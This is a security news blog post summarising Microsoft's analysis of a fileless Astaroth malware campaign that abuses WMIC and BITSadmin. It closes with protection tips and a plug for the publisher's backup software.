• Linkedin
  • Reddit

Summary

According to Microsoft, its Defender ATP Research team has exposed it discovers a fileless malware campaign spreading Astaroth backdoor to infect many victims by using living-off-the-land techniques. Now, let’s see some details on this malware attack.

Microsoft Warns About Fileless Malware Campaign

According to a blog from Microsoft, the security team finds the detection algorithm used to catch a specific fileless technique is abnormal when doing a standard review of telemetry. The use of the Windows Management Instrumentation Command-line (WMIC) tool has a rapid increase.

sharp increase in the use of the WMIC tool

When Microsoft notices the recent campaigns, it makes a detailed analysis of these events. The attacks would start with a spear phishing email that contains a link to a malicious .LNK shortcut file.

How Fileless Astaroth Malware Campaign Works

If users are careless to open this file, it will run BAT command line to open WMIC. WMIC downloads an SLC file hosts an obfuscated JavaScripts that runs WMIC again. Then, it downloads another XSL file that uses BITSadmin to download additional payloads…

From the following figure, users can find a number of tools are downloaded, one after another. These programs also download additional code and pass their output to one another - executing only in memory without saving any data on the hard drive.

how Astaroth malware campaign works

It is difficult to detect any malicious code for traditional antivirus software since no file is saved on the disk. In the end, Astaroth is downloaded to a system. The Trojan can dump credentials for various categories of apps and also upload the stolen information to a remote server.

Astaroth was first spotted in 2018 and seen again in February this year in campaigns that targeted Brazilian and European users. Recently, it was also detected in May and June this year by Microsoft Defender ATP Research Team.

According to experts, any file run is not a system tool during the attack chain. The technique is called living-off-the-land that uses legitimate tools which are present on the target system to disguise as a regular activity. It has become popular with malware attackers in the last three years and now is used widely.

Attackers could commit crimes, such as try moving laterally across networks using the stolen data, sell the information in the cybercriminal underground, carry out financial theft, and more.

How to Protect PC Against Fileless Malware Campaign

For the malicious activities, they are reported in Microsoft Defender Security Center as alerts. And then, this company can use some features in Microsoft Defender ATP including endpoint detection and response (EDR), advanced hunting and other functions to investigate and respond to attacks.

It is worth noting that Microsoft Defender ATP EDR can perform durable and strong detections for fileless technique across the entire attack chain.

Windows Defender ATP Improves Threat Protection Ability

Windows Defender ATP has improved its threat protection ability so as to provide better protection for the computer and data.

Read More

Thus, to protect PCs against fileless Astaroth malware, ensure Windows Defender is running and has the latest updates. Of course, keeping the latest Windows operating system is necessary.

Additionally, for the filess malware campaign, Office 365ATP (advanced Threat Protection) could detect the emails that include malicious links that start the infection chain.

Tip: Sometimes, the malware campaign could lead to data loss. To protect important files, it is better to make a backup for these files. Here, our professional file backup software, MiniTool ShadowMaker, will be a good assistant.
  • Linkedin
  • Reddit